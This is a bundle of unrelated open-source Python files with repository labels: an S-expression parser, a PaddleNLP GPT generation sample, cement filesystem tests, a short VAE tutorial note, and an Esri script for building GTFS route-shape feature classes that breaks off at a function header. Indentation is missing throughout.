| 161 |
67725
|
<reponame>windelbouwman/ppci<filename>ppci/lang/sexpr.py
""" Functionality to tokenize and parse S-expressions.
"""
import io
from .common import SourceLocation
from .tools.handlexer import HandLexerBase
from .tools.recursivedescent import RecursiveDescentParser
__all__ = ("parse_sexpr",)
def tokenize_sexpr(text):
"""Generator that generates tokens for (WASM-compatible) S-expressions.
Would need work to produce tokens suited for e.g. syntax highlighting,
but good enough for now, to make the parser work.
"""
filename = "?"
f = io.StringIO(text)
lexer = SExpressionLexer()
return lexer.tokenize(f, filename)
def create_chunks(f):
""" Create a sequence of chunks """
for row, line in enumerate(f, 1):
yield (row, 1, line)
class SExpressionLexer(HandLexerBase):
""" Lexical scanner for s expressions """
def tokenize(self, f, filename):
chunks = create_chunks(f)
for token in super().tokenize(filename, chunks, self.lex_sexpr):
# print(token)
# Modify some values of tokens:
if token.typ == "string":
token.val = token.val[1:-1] # Strip of '"'
elif token.typ == "word":
if token.val[0] in "-+.01234567890": # maybe a number
try:
if "." in token.val or "e" in token.val.lower():
token.val = float(token.val)
elif token.val.startswith("0x"):
token.val = int(token.val, 16)
else:
token.val = int(token.val)
except ValueError:
pass
yield token
def lex_sexpr(self):
c = self.next_char()
if c is None:
return # EOF
if c == "(":
if self.accept(";"):
self.lex_block_comment()
else:
self.emit("(")
elif c == ";":
if self.accept(";"):
self.lex_line_comment()
else:
self.lex_atom()
elif c == ")":
self.emit(")")
elif c == '"':
self.lex_string()
elif c in " \t\r\n":
self.ignore()
else:
self.lex_atom()
return self.lex_sexpr
def lex_atom(self):
while True:
c = self.next_char()
if c is None:
break
elif c in "() \t\r\n;":
self.backup_char(c)
break
self.emit("word")
def lex_line_comment(self):
""" Eat all characters until end of line """
while True:
c = self.next_char()
if c is None or c in "\n\r":
break
self.emit("comment")
return
def lex_block_comment(self):
level = 1
c2 = self.next_char(eof=False)
while level > 0:
c1 = c2
c2 = self.next_char(eof=False)
if c1 == ";" and c2 == ")":
level -= 1
elif c1 == "(" and c2 == ";":
level += 1
self.emit("comment")
def lex_string(self):
while True:
if self.accept("\\"):
                self.next_char(eof=False) # Accept any escaped char
elif self.accept('"'):
self.emit("string")
break
else:
self.next_char(eof=False)
tokens2ignore = ("comment",)
def filtered(tokens):
for token in tokens:
if token.typ not in tokens2ignore:
yield token
class SExpressionParser(RecursiveDescentParser):
""" This class can be used to parse S-expressions. """
def parse(self, tokens):
self.init_lexer(tokens)
expressions = []
while not self.at_end:
expressions.append(self.parse_sexpr())
return expressions
def parse_sexpr(self) -> tuple:
values = []
self.consume("(")
while self.peek != ")":
if self.at_end:
self.error("Unexpected end of file")
elif self.peek == "(":
val = self.parse_sexpr()
else:
val = self.consume().val
values.append(val)
self.consume(")")
return tuple(values)
def parse_sexpr(text: str, multiple=False) -> tuple:
"""Parse S-expression given as string.
Returns a tuple that represents the S-expression.
"""
assert isinstance(text, str)
expressions = parse_multiple_sexpr(text)
if len(expressions) != 1:
raise ValueError("Expected a single S-expression")
return expressions[0]
def parse_multiple_sexpr(text: str) -> tuple:
assert isinstance(text, str)
# Check start ok
tokens = filtered(tokenize_sexpr(text))
parser = SExpressionParser()
return parser.parse(tokens)
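# A small usage sketch (as called from client code with ppci importable; the
# WASM-ish input string is arbitrary):
#
#   from ppci.lang.sexpr import parse_sexpr
#   parse_sexpr('(module (memory 1) (func $f))')
#   # -> ('module', ('memory', 1), ('func', '$f'))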
|
examples/faster/faster_generation/samples/gpt_sample.py
|
JeremyZhao1998/PaddleNLP
| 7,091 |
67749
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddlenlp.transformers import GPTLMHeadModel, GPTChineseTokenizer
import paddle
model_name = 'gpt-cpm-small-cn-distill'
tokenizer = GPTChineseTokenizer.from_pretrained(model_name)
model = GPTLMHeadModel.from_pretrained(model_name)
model.eval()
inputs = '花间一壶酒,独酌无相亲。举杯邀明月,'
inputs_ids = tokenizer(inputs)["input_ids"]
inputs_ids = paddle.to_tensor(inputs_ids, dtype='int64').unsqueeze(0)
outputs, _ = model.generate(
input_ids=inputs_ids,
max_length=10,
decode_strategy='greedy_search',
use_faster=True)
result = tokenizer.convert_ids_to_string(outputs[0].numpy().tolist())
print("Model input:", inputs)
print("Result:", result)
# 对影成三人。
|
tests/utils/test_fs.py
|
andriyor/cement
| 826 |
67755
|
import os
from pytest import raises
from cement.utils import fs
def test_abspath(tmp):
path = fs.abspath('.')
assert path.startswith('/')
def test_join(tmp, rando):
full_path = os.path.abspath(os.path.join(tmp.dir, rando))
assert fs.join(tmp.dir, rando) == full_path
def test_join_exists(tmp, rando):
full_path = os.path.abspath(os.path.join(tmp.dir, rando))
res = fs.join_exists(tmp.dir, rando)
assert res[0] == full_path
assert res[1] is False
with open(full_path, 'w') as f:
f.write('data')
res = fs.join_exists(tmp.dir, rando)
assert res[1] is True
def test_ensure_dir_exists(tmp, rando):
fs.ensure_dir_exists(fs.join(tmp.dir, rando))
assert os.path.exists(fs.join(tmp.dir, rando))
with raises(AssertionError, match='(.*)exists but is not a directory(.*)'):
fs.ensure_dir_exists(tmp.file)
def test_ensure_parent_dir_exists(tmp, rando):
fs.ensure_parent_dir_exists(fs.join(tmp.dir, 'parent', rando))
assert os.path.exists(fs.join(tmp.dir, 'parent'))
def test_tmp(tmp, rando):
t1 = fs.Tmp()
assert os.path.exists(t1.dir)
assert os.path.exists(t1.file)
with fs.Tmp() as t2:
pass
assert not os.path.exists(t2.dir)
assert not os.path.exists(t2.file)
def test_backup(tmp):
bkfile = fs.backup(tmp.file)
assert "%s.bak" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkfile = fs.backup(tmp.file)
assert "%s.bak.0" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkfile = fs.backup(tmp.file)
assert "%s.bak.1" % os.path.basename(tmp.file) == os.path.basename(bkfile)
bkdir = fs.backup(tmp.dir)
assert "%s.bak" % os.path.basename(tmp.dir) == os.path.basename(bkdir)
assert fs.backup('someboguspath') is None
def test_backup_dir_trailing_slash(tmp):
# https://github.com/datafolklabs/cement/issues/610
bkdir = fs.backup("%s/" % tmp.dir)
assert "%s.bak" % os.path.basename(tmp.dir) == os.path.basename(bkdir)
|
tutorials/W2D5_GenerativeModels/solutions/W2D5_Tutorial1_Solution_f63c0e9f.py
|
justynaekert/course-content-dl
| 473 |
67760
|
"""
An Autoencoder accepts input, compresses it, and recreates it. On the other hand,
VAEs assume that the source data has some underlying distribution and attempt
to find the distribution parameters. So, VAEs are similar to GANs
(but note that GANs work differently, as we will see in the next tutorials).
""";
|
generate-GTFS-shapes/scripts/Step1_MakeShapesFC.py
|
d-wasserman/public-transit-tools
| 130 |
67769
|
###############################################################################
## Tool name: Generate GTFS Route Shapes
## Step 1: Generate Shapes on Map
## Creator: <NAME>, Esri
## Last updated: 4 September 2019
###############################################################################
''' This tool generates a feature class of route shapes for GTFS data.
The route shapes show the geographic paths taken by the transit vehicles along
the streets or tracks. Each unique sequence of stop visits in the GTFS data will
get its own shape in the output feature class. Alternatively, the user can
select existing shapes from shapes.txt to draw in the map. The user can edit the output
feature class shapes as desired. Then, the user should use this feature class
and the other associated files in the output GDB as input to Step 2 in order
to create updated .txt files for use in the GTFS dataset.'''
################################################################################
'''Copyright 2019 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.'''
################################################################################
import sqlite3, operator, os, re, csv, itertools, sys
import numpy as np
import AGOLRouteHelper
import arcpy
class CustomError(Exception):
pass
# User input variables, set in the scripts that get input from the GUI
inGTFSdir = None
outDir = None
outGDBName = None
in_route_type_Street = None
in_route_type_Straight = None
inNetworkDataset = None
impedanceAttribute = None
driveSide = None
UTurn_input = None
restrictions = None
useJunctions = None
useBearing = None
BearingTol = None
CurbApproach = None
MaxAngle = None
useNA = None
useAGOL = None
badStops = []
# Global derived variables
ProductName = None
outGDB = None
SQLDbase = None
outSequencePoints = None
outRoutesfc = None
NoRouteGenerated = None
# Other global variables
# Use WGS coordinates because that's what the GTFS spec uses
WGSCoords = "GEOGCS['GCS_WGS_1984',DATUM['D_WGS_1984', \
SPHEROID['WGS_1984',6378137.0,298.257223563]], \
PRIMEM['Greenwich',0.0],UNIT['Degree',0.0174532925199433]]; \
-400 -400 1000000000;-100000 10000;-100000 10000; \
8.98315284119522E-09;0.001;0.001;IsHighPrecision"
WGSCoords_WKID = 4326
# Explicitly set max allowed length for route_desc. Some agencies are wordy.
max_route_desc_length = 250
def RunStep1_existing_shapestxt(shapelist):
'''Create feature classes of shapes and relevant stop sequences using an existing shapes.txt file
so the user can edit existing shapes.'''
try:
# It's okay to overwrite stuff.
orig_overwrite = arcpy.env.overwriteOutput
arcpy.env.overwriteOutput = True
# Check that the user's software version can support this tool
check_Arc_version()
# Set up the outputs
global outGDBName
if not outGDBName.lower().endswith(".gdb"):
outGDBName += ".gdb"
outGDB = os.path.join(outDir, outGDBName)
outSequencePointsName = "Stops_wShapeIDs"
outSequencePoints = os.path.join(outGDB, outSequencePointsName)
outShapesFCName = "Shapes"
outShapesFC = os.path.join(outGDB, outShapesFCName)
SQLDbase = os.path.join(outGDB, "SQLDbase.sql")
# Create output geodatabase
arcpy.management.CreateFileGDB(outDir, outGDBName)
# ----- SQLize the GTFS data -----
try:
# These are the GTFS files we need to use in this tool, so we will add them to a SQL database.
files_to_sqlize = ["stops", "stop_times", "trips", "routes", "shapes"]
connect_to_sql(SQLDbase)
SQLize_GTFS(files_to_sqlize)
except:
arcpy.AddError("Error SQLizing the GTFS data.")
raise
# ----- Add shapes to feature class -----
# Find all the route_ids and associated info
get_route_info()
# Make a feature class for shapes
arcpy.management.CreateFeatureclass(outGDB, outShapesFCName, "POLYLINE", '', '', '', WGSCoords)
arcpy.management.AddField(outShapesFC, "shape_id", "TEXT")
arcpy.management.AddField(outShapesFC, "route_id", "TEXT")
arcpy.management.AddField(outShapesFC, "route_short_name", "TEXT")
arcpy.management.AddField(outShapesFC, "route_long_name", "TEXT")
arcpy.management.AddField(outShapesFC, "route_desc", "TEXT", "", "", max_route_desc_length)
arcpy.management.AddField(outShapesFC, "route_type", "SHORT")
arcpy.management.AddField(outShapesFC, "route_type_text", "TEXT")
# Populate shapes feature class with user's selected shapes from shapes.txt
with arcpy.da.InsertCursor(outShapesFC, ["SHAPE@", "shape_id", "route_id",
"route_short_name", "route_long_name", "route_desc",
"route_type", "route_type_text"]) as cur:
for shape in shapelist:
# Get the route ids that have this shape.
# There should normally be a 1-1 relationship between shape_id and route_id, but that is not guaranteed.
# We're just adding route info to the shapes feature class for readability
shapesroutesfetch = '''
SELECT DISTINCT route_id FROM trips WHERE shape_id='%s'
;''' % shape
c.execute(shapesroutesfetch)
weresome = False
for route in c:
weresome = True
append_existing_shape_to_fc(shape, cur, route[0])
if not weresome:
# No trips actually use this shape, so skip adding route info
arcpy.AddWarning("shape_id %s is not used by any \
trips in your trips.txt file. You can still update this shape, but this might be an indication of problems in your GTFS dataset." % shape)
append_existing_shape_to_fc(shape, cur)
# ----- Find the sequences of stops associated with these shapes -----
# Find the lat/lon coordinates of all stops
get_stop_lat_lon()
# Create a feature class for stops associated with the selected shapes - for reference and for input to Step 2
arcpy.management.CreateFeatureclass(outGDB, outSequencePointsName, "POINT", "", "", "", WGSCoords)
arcpy.management.AddField(outSequencePoints, "stop_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "shape_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "sequence", "LONG")
# Populate the feature class with stops in the correct sequence
badStops = []
with arcpy.da.InsertCursor(outSequencePoints, ["SHAPE@X", "SHAPE@Y", "shape_id", "sequence", "stop_id"]) as cur:
for shape_id in shapelist:
# Trips designated with this shape_id
trips_for_shape = get_trips_with_shape_id(shape_id)
# The sequence of stops visited by each of these trips. There should normally be only one unique sequence associated with each shape_id, but that is not guaranteed.
stop_sequences_for_shape = []
for trip in trips_for_shape:
stop_sequences_for_shape.append(get_trip_stop_sequence(trip))
stop_sequences_for_shape = list(set(stop_sequences_for_shape))
# Add each stop in the sequence to the feature class
for sequence in stop_sequences_for_shape:
sequence_num = 1
for stop in sequence:
try:
stop_lat = stoplatlon_dict[stop][0]
stop_lon = stoplatlon_dict[stop][1]
except KeyError:
badStops.append(stop)
sequence_num += 1
continue
cur.insertRow((float(stop_lon), float(stop_lat), shape_id, sequence_num, stop))
sequence_num += 1
if badStops:
badStops = sorted(list(set(badStops)))
messageText = "Your stop_times.txt file lists times for the following stops which are not included in your stops.txt file. These stops have been ignored. "
if ProductName == "ArcGISPro":
messageText += str(badStops)
else:
messageText += unicode(badStops)
arcpy.AddWarning(messageText)
# Set output
arcpy.SetParameterAsText(4, outShapesFC)
arcpy.SetParameterAsText(5, outSequencePoints)
arcpy.AddMessage("Done!")
arcpy.AddMessage("Output generated in " + outGDB + ":")
arcpy.AddMessage("- Shapes")
arcpy.AddMessage("- Stops_wShapeIDs")
except CustomError:
arcpy.AddError("Error generating shapes feature class from existing shapes.txt file.")
pass
except:
raise
finally:
arcpy.env.overwriteOutput = orig_overwrite
# ----- Main part of script -----
def RunStep1():
'''Run Step 1 - Generate feature class of shapes for input to Step 2, which
generates the actual GTFS shapes.txt file.'''
try:
# It's okay to overwrite stuff.
orig_overwrite = arcpy.env.overwriteOutput
arcpy.env.overwriteOutput = True
# Check that the user's software version can support this tool
check_Arc_version(useAGOL, useNA)
# Check out the Network Analyst extension license
if useNA:
if arcpy.CheckExtension("Network") == "Available":
arcpy.CheckOutExtension("Network")
else:
arcpy.AddError("The Network Analyst license is unavailable.")
raise CustomError
if useAGOL:
# Get the user's ArcGIS Online token. They must already be signed in to use this tool.
# That way we don't need to collect a username and password.
# But, you can't run this script in standalone python.
AGOLRouteHelper.get_token()
if AGOLRouteHelper.token == None:
arcpy.AddError("Unable to retrieve token for ArcGIS Online. To use this tool, \
you must be signed in to ArcGIS Online with an account that has routing privileges and credits. \
Talk to your organization's ArcGIS Online administrator for assistance.")
raise CustomError
arcpy.AddMessage("Successfully retrieved ArcGIS Online token.")
# ----- Set up the run, fix some inputs -----
# Input format is a string separated by a ; ("0 - Tram, Streetcar, Light rail;3 - Bus;5 - Cable car")
global route_type_Straight_textlist, route_type_Street_textlist, route_types_Straight, route_types_Street
if in_route_type_Street:
route_type_Street_textlist = in_route_type_Street.split(";")
else:
route_type_Street_textlist = []
if in_route_type_Straight:
route_type_Straight_textlist = in_route_type_Straight.split(";")
else:
route_type_Straight_textlist = []
route_types_Street = []
route_types_Straight = []
for rtype in route_type_Street_textlist:
route_types_Street.append(int(rtype.split(" - ")[0].strip('\'')))
for rtype in route_type_Straight_textlist:
route_types_Straight.append(int(rtype.split(" - ")[0].strip('\'')))
# Set curb approach based on side of road vehicles drive on
global CurbApproach
driveSide = "Right"
if driveSide == "Right":
CurbApproach = 1 #"Right side of vehicle"
else:
CurbApproach = 2 #"Left side of vehcle"
# Uturn policy is explained here: http://resources.arcgis.com/en/help/main/10.1/index.html#//00480000000n000000
global UTurns
if UTurn_input == "Allowed anywhere":
UTurns = "ALLOW_UTURNS"
elif UTurn_input == "Allowed only at intersections and dead ends":
UTurns = "ALLOW_DEAD_ENDS_AND_INTERSECTIONS_ONLY"
elif UTurn_input == "Allowed only at dead ends":
UTurns = "ALLOW_DEAD_ENDS_ONLY"
elif UTurn_input == "Not allowed anywhere":
UTurns = "NO_UTURNS"
# Sometimes, when locating stops, they snap to the closest street, which is
# actually a side street instead of the main road where the stop is really
# located. The Route results consequently have a lot of little loops or
# spikes sticking out the side. Sometimes we can improve results by
# locating stops on network junctions instead of streets. Sometimes, however,
# this makes the results worse, so we let the user decide whether to try it.
# Note: As of January 2017, I have removed the useJunctions option from
# the tool because it never really worked that great, and the useBearing
# method is a dramatic improvement. I'm leaving this code here in case
# someone wants it again.
global search_criteria
if useJunctions:
search_criteria = []
NAdesc = arcpy.Describe(inNetworkDataset)
for source in NAdesc.sources:
if source.sourceType in ["JunctionFeature", "SystemJunction"]:
search_criteria.append([source.name, "SHAPE"])
else:
search_criteria.append([source.name, "NONE"])
else:
search_criteria = "#"
# Initialize a list for shapes that couldn't be generated from the route solver
global NoRouteGenerated
NoRouteGenerated = []
# Set up the outputs
global outGDB, outSequencePoints, outRoutesfc, outRoutesfcName, SQLDbase, outGDBName
if not outGDBName.lower().endswith(".gdb"):
outGDBName += ".gdb"
outGDB = os.path.join(outDir, outGDBName)
outSequencePointsName = "Stops_wShapeIDs"
outSequencePoints = os.path.join(outGDB, outSequencePointsName)
outRoutesfcName = "Shapes"
outRoutesfc = os.path.join(outGDB, outRoutesfcName)
SQLDbase = os.path.join(outGDB, "SQLDbase.sql")
# Create output geodatabase
arcpy.management.CreateFileGDB(outDir, outGDBName)
# ----- SQLize the GTFS data -----
try:
# These are the GTFS files we need to use in this tool, so we will add them to a SQL database.
files_to_sqlize = ["stops", "stop_times", "trips", "routes"]
connect_to_sql(SQLDbase)
SQLize_GTFS(files_to_sqlize)
except:
arcpy.AddError("Error SQLizing the GTFS data.")
raise
# ----- Get lat/long for all stops and add to dictionary. Calculate location fields if necessary. -----
get_stop_lat_lon()
# Grab the pointGeometry objects for each stop
if useBearing:
get_stop_geom()
# Calculate location fields for the stops and save them to a dictionary.
if useNA and not useBearing:
calculate_stop_location_fields()
# ----- Make dictionary of route info -----
get_route_info()
# ----- Match trip_ids with route_ids -----
arcpy.AddMessage("Collecting GTFS trip information...")
get_trip_route_info()
# ----- Create ordered stop sequences -----
get_unique_stop_sequences()
# ----- Figure out which routes go with which shapes and update trips table -----
global shape_route_dict
shape_route_dict = {}
for shape in shape_trip_dict:
shaperoutes = []
for trip in shape_trip_dict[shape]:
shaperoutes.append(trip_route_dict[trip])
# Update the trips table with the shape assigned to the trip
updatetripstablestmt = "UPDATE trips SET shape_id='%s' WHERE trip_id='%s'" % (shape, trip)
c.execute(updatetripstablestmt)
conn.commit()
shaperoutesset = set(shaperoutes)
for route in shaperoutesset:
shape_route_dict.setdefault(shape, []).append(route)
conn.close()
# ----- Generate street and straight routes -----
# Create a points feature class for the stops to input for Routes
# We'll save this so users can see the stop sequences with the shape_ids.
arcpy.management.CreateFeatureclass(outGDB, outSequencePointsName, "POINT", "", "", "", WGSCoords)
arcpy.management.AddField(outSequencePoints, "stop_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "shape_id", "TEXT")
arcpy.management.AddField(outSequencePoints, "sequence", "LONG")
if useNA and not useBearing:
# We will pre-calculate location fields for faster loading if we're not using Bearing
arcpy.management.AddField(outSequencePoints, "CurbApproach", "SHORT")
arcpy.management.AddField(outSequencePoints, "SourceID", "LONG")
arcpy.management.AddField(outSequencePoints, "SourceOID", "LONG")
arcpy.management.AddField(outSequencePoints, "PosAlong", "DOUBLE")
arcpy.management.AddField(outSequencePoints, "SideOfEdge", "LONG")
if useBearing:
# If we're using Bearing, add the relevant fields
arcpy.management.AddField(outSequencePoints, "CurbApproach", "SHORT")
arcpy.management.AddField(outSequencePoints, "Bearing", "DOUBLE")
arcpy.management.AddField(outSequencePoints, "BearingTol", "DOUBLE")
# Flag for whether we created the output fc in from Routes or if we need
# to create it in the straight-line part
Created_Street_Output = False
# Generate shapes following the streets
if route_types_Street:
if useNA:
Generate_Shapes_Street()
Created_Street_Output = True
elif useAGOL:
Generate_Shapes_AGOL()
Created_Street_Output = True
# Generate routes as straight lines between stops
if route_types_Straight or NoRouteGenerated:
Generate_Shapes_Straight(Created_Street_Output)
global badStops
if badStops:
badStops = sorted(list(set(badStops)))
messageText = "Your stop_times.txt file lists times for the following stops which are not included in your stops.txt file. These stops have been ignored. "
if ProductName == "ArcGISPro":
messageText += str(badStops)
else:
messageText += unicode(badStops)
arcpy.AddWarning(messageText)
# ----- Add route information to output feature class -----
arcpy.AddMessage("Adding GTFS route information to output shapes feature class")
# Explicitly set max allowed length for route_desc. Some agencies are wordy.
max_route_desc_length = 250
arcpy.management.AddField(outRoutesfc, "shape_id", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_id", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_short_name", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_long_name", "TEXT")
arcpy.management.AddField(outRoutesfc, "route_desc", "TEXT", "", "", max_route_desc_length)
arcpy.management.AddField(outRoutesfc, "route_type", "SHORT")
arcpy.management.AddField(outRoutesfc, "route_type_text", "TEXT")
with arcpy.da.UpdateCursor(outRoutesfc, ["Name", "shape_id", "route_id",
"route_short_name", "route_long_name", "route_desc",
"route_type", "route_type_text"]) as ucursor:
for row in ucursor:
shape_id = row[0]
route_id = shape_route_dict[shape_id][0]
route_short_name = RouteDict[route_id][1]
route_long_name = RouteDict[route_id][2]
route_desc = RouteDict[route_id][3]
route_type = RouteDict[route_id][4]
route_type_text = RouteDict[route_id][8]
row[0] = row[0]
row[1] = shape_id
row[2] = route_id
row[3] = route_short_name
row[4] = route_long_name
row[5] = route_desc[0:max_route_desc_length] if route_desc else route_desc #logic handles the case where it's empty
row[6] = route_type
row[7] = route_type_text
ucursor.updateRow(row)
# ----- Finish things up -----
# Add output to map.
if useNA:
arcpy.SetParameterAsText(12, outRoutesfc)
arcpy.SetParameterAsText(13, outSequencePoints)
elif useAGOL:
arcpy.SetParameterAsText(8, outRoutesfc)
arcpy.SetParameterAsText(9, outSequencePoints)
else:
arcpy.SetParameterAsText(4, outRoutesfc)
arcpy.SetParameterAsText(5, outSequencePoints)
arcpy.AddMessage("Done!")
arcpy.AddMessage("Output generated in " + outGDB + ":")
arcpy.AddMessage("- Shapes")
arcpy.AddMessage("- Stops_wShapeIDs")
except CustomError:
arcpy.AddError("Error generating shapes feature class from GTFS data.")
pass
except:
raise
finally:
arcpy.env.overwriteOutput = orig_overwrite
def SQLize_GTFS(files_to_sqlize):
''' SQLize the GTFS data'''
arcpy.AddMessage("SQLizing the GTFS data...")
arcpy.AddMessage("(This step might take a while for large datasets.)")
# Schema of standard GTFS, with a 1 or 0 to indicate if the field is required
sql_schema = {
"stops" : {
"stop_id" : ("TEXT", 1),
"stop_code" : ("TEXT", 0),
"stop_name" : ("TEXT", 1),
"stop_desc" : ("TEXT", 0),
"stop_lat" : ("REAL", 1),
"stop_lon" : ("REAL", 1),
"zone_id" : ("TEXT", 0),
"stop_url" : ("TEXT", 0),
"location_type" : ("INTEGER", 0),
"parent_station" : ("TEXT", 0),
"stop_timezone" : ("TEXT", 0),
"wheelchair_boarding": ("INTEGER", 0)
} ,
"stop_times" : {
"trip_id" : ("TEXT", 1),
"arrival_time" : ("TEXT", 1),
"departure_time" : ("TEXT", 1),
"stop_id" : ("TEXT", 1),
"stop_sequence" : ("INTEGER", 1),
"stop_headsign" : ("TEXT", 0),
"pickup_type" : ("INTEGER", 0),
"drop_off_type" : ("INTEGER", 0),
"shape_dist_traveled" : ("REAL", 0)
} ,
"trips" : {
"route_id" : ("TEXT", 1),
"service_id" : ("TEXT", 1),
"trip_id" : ("TEXT", 1),
"trip_headsign" : ("TEXT", 0),
"trip_short_name" : ("TEXT", 0),
"direction_id" : ("INTEGER", 0),
"block_id" : ("TEXT", 0),
"shape_id" : ("TEXT", 0),
"wheelchair_accessible" : ("INTEGER", 0)
} ,
"routes" : {
"route_id" : ("TEXT", 1),
"agency_id" : ("TEXT", 0),
"route_short_name": ("TEXT", 0),
"route_long_name": ("TEXT", 0),
"route_desc": ("TEXT", 0),
"route_type": ("INTEGER", 1),
"route_url": ("TEXT", 0),
"route_color": ("TEXT", 0),
"route_text_color": ("TEXT", 0),
} ,
"shapes" : {
"shape_id": ("TEXT", 1),
"shape_pt_lat": ("REAL", 1),
"shape_pt_lon": ("REAL", 1),
"shape_pt_sequence": ("INTEGER", 1),
"shape_dist_traveled": ("REAL", "NULL")
}
}
# SQLize each file we care about, using its own schema and ordering
for GTFSfile in files_to_sqlize:
# Note: a check for existence of each required file is in tool validation
# Open the file for reading
fname = os.path.join(inGTFSdir, GTFSfile) + ".txt"
if ProductName == "ArcGISPro":
f = open(fname, encoding="utf-8-sig")
else:
f = open(fname)
reader = csv.reader(f)
# Put everything in utf-8 to handle BOMs and weird characters.
# Eliminate blank rows (extra newlines) while we're at it.
if ProductName == "ArcGISPro":
reader = ([x.strip() for x in r] for r in reader if len(r) > 0)
else:
reader = ([x.decode('utf-8-sig').strip() for x in r] for r in reader if len(r) > 0)
# First row is column names:
columns = [name.strip() for name in next(reader)]
# Set up the table schema
schema = ""
for col in columns:
try:
# Read the data type from the GTFS schema dictionary
schema = schema + col + " " + sql_schema[GTFSfile][col][0] + ", "
except KeyError:
# If they're using a custom field, preserve it and assume it's text.
schema = schema + col + " TEXT, "
schema = schema[:-2]
# Make sure file has all the required fields
for col in sql_schema[GTFSfile]:
if sql_schema[GTFSfile][col][1] == 1:
if not col in columns:
arcpy.AddError("GTFS file " + GTFSfile + ".txt is missing required field '" + col + "'.")
raise CustomError
# Make sure lat/lon values are valid
if GTFSfile == "stops":
rows = check_latlon_fields(reader, columns, "stop_lat", "stop_lon", "stop_id", fname)
elif GTFSfile == "shapes":
rows = check_latlon_fields(reader, columns, "shape_pt_lat", "shape_pt_lon", "shape_id", fname)
# Otherwise just leave them as they are
else:
rows = reader
# Create the SQL table
c.execute("DROP TABLE IF EXISTS %s;" % GTFSfile)
create_stmt = "CREATE TABLE %s (%s);" % (GTFSfile, schema)
c.execute(create_stmt)
conn.commit()
# Add the data to the table
values_placeholders = ["?"] * len(columns)
c.executemany("INSERT INTO %s (%s) VALUES (%s);" %
(GTFSfile,
",".join(columns),
",".join(values_placeholders))
, rows)
conn.commit()
# If optional columns in routes weren't included in the original data, add them so we don't encounter errors later.
if GTFSfile == "routes":
for col in sql_schema["routes"]:
if not col in columns:
c.execute("ALTER TABLE routes ADD COLUMN %s %s" % (col, sql_schema[GTFSfile][col][0]))
conn.commit()
# If our original data did not have shape-related fields, add them.
if GTFSfile == "trips":
if 'shape_id' not in columns:
if "shapes" in files_to_sqlize:
arcpy.AddError("Your trips.txt file does not contain a shape_id field. In order to update your shapes.txt file, \
you must first assign each trip_id in trips.txt a valid shape_id. If you do not have this information, it is recommended that you \
create a new shapes.txt file from scratch rather than attempting to update your existing one.")
raise CustomError
c.execute("ALTER TABLE trips ADD COLUMN shape_id TEXT")
conn.commit()
if GTFSfile == "stop_times":
if 'shape_dist_traveled' not in columns:
if "shapes" in files_to_sqlize:
arcpy.AddWarning("Your stop_times.txt file does not contain a shape_dist_traveled field. When you run Step 2 of this tool, \
a shape_dist_traveled field will be added, and it will be populated with valid values for the shape(s) you have chosen to update. However, the \
field will remain blank for all other shapes.")
c.execute("ALTER TABLE stop_times ADD COLUMN shape_dist_traveled REAL")
conn.commit()
if GTFSfile == "shapes":
if 'shape_dist_traveled' not in columns:
arcpy.AddWarning("Your shapes.txt file does not contain a shape_dist_traveled field. When you run Step 2 of this tool, \
a shape_dist_traveled field will be added, and it will be populated with valid values for the shape(s) you have chosen to update. However, the \
field will remain blank for all other shapes.")
c.execute("ALTER TABLE shapes ADD COLUMN shape_dist_traveled REAL")
conn.commit()
f.close()
# Generate indices
c.execute("CREATE INDEX stoptimes_index_tripIDs ON stop_times (trip_id);")
c.execute("CREATE INDEX trips_index_tripIDs ON trips (trip_id);")
if "shapes" in files_to_sqlize:
c.execute("CREATE INDEX trips_index_shapeIDs ON trips (shape_id);")
c.execute("CREATE INDEX shapes_index_shapeIDs ON shapes (shape_id, shape_pt_sequence);")
def check_latlon_fields(rows, col_names, lat_col_name, lon_col_name, id_col_name, fname):
'''Ensure lat/lon fields are valid'''
def check_latlon_cols(row):
id_val = row[col_names.index(id_col_name)]
lat = row[col_names.index(lat_col_name)]
lon = row[col_names.index(lon_col_name)]
try:
lat_float = float(lat)
except ValueError:
msg = '%s "%s" in %s contains an invalid non-numerical value \
for the %s field: "%s". Please double-check all lat/lon values in your \
%s file.' % (id_col_name, id_val, fname, lat_col_name, lat, fname)
arcpy.AddError(msg)
raise CustomError
try:
stop_lon_float = float(lon)
except ValueError:
msg = '%s "%s" in %s contains an invalid non-numerical value \
for the %s field: "%s". Please double-check all lat/lon values in your \
%s file.' % (id_col_name, id_val, fname, lon_col_name, lon, fname)
arcpy.AddError(msg)
raise CustomError
if not (-90.0 <= lat_float <= 90.0):
msg = '%s "%s" in %s contains an invalid value outside the \
range (-90, 90) the %s field: "%s". %s values must be in valid WGS 84 \
coordinates. Please double-check all lat/lon values in your %s file.\
' % (id_col_name, id_val, fname, lat_col_name, lat, lat_col_name, fname)
arcpy.AddError(msg)
raise CustomError
if not (-180.0 <= stop_lon_float <= 180.0):
msg = '%s "%s" in %s contains an invalid value outside the \
range (-180, 180) the %s field: "%s". %s values must be in valid WGS 84 \
coordinates. Please double-check all lat/lon values in your %s file.\
' % (id_col_name, id_val, fname, lon_col_name, lon, lon_col_name, fname)
arcpy.AddError(msg)
raise CustomError
return row
if ProductName == "ArcGISPro":
return map(check_latlon_cols, rows)
else:
return itertools.imap(check_latlon_cols, rows)
def Generate_Shapes_Street():
'''Generate preliminary shapes for each route by calculating the optimal
route along the network with the Network Analyst Route solver.'''
